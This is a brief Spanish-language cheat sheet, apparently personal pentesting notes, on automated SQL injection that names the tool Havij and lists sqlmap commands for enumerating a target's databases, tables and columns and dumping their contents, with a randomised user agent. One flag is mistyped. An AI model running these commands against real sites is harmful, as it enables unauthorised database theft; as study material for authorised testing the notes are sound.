# AUTOMATIC INJECTION

## **HAVIJ**

&#x20;Software libre que permite automatizar los ataques de SQL Injection.

&#x20;Tiene muchas herramientas, buscar manual

## &#x20;**SQLMAP**

### **Enumerar bases de datos**

&#x20;`sqlmap -u [url/article.php?id=25] --dbs --random-agent`&#x20;

### Enumerar las tablas de la base de datos

&#x20;`sqlmap -u [url/article.php?id=25] -D steppindbadmin --tables --random-agent`&#x20;

### Enumera las columnas de la tabla

&#x20;`sqlmap -u [url/article.php?id=25] -D steppindbadmin --T items --columns --random-agent`

### Obtener información de las columnas

&#x20;`sqlmap -u [url/article.php?id=25] -D steppindbadmin --T items -C id --dump --random-agent`
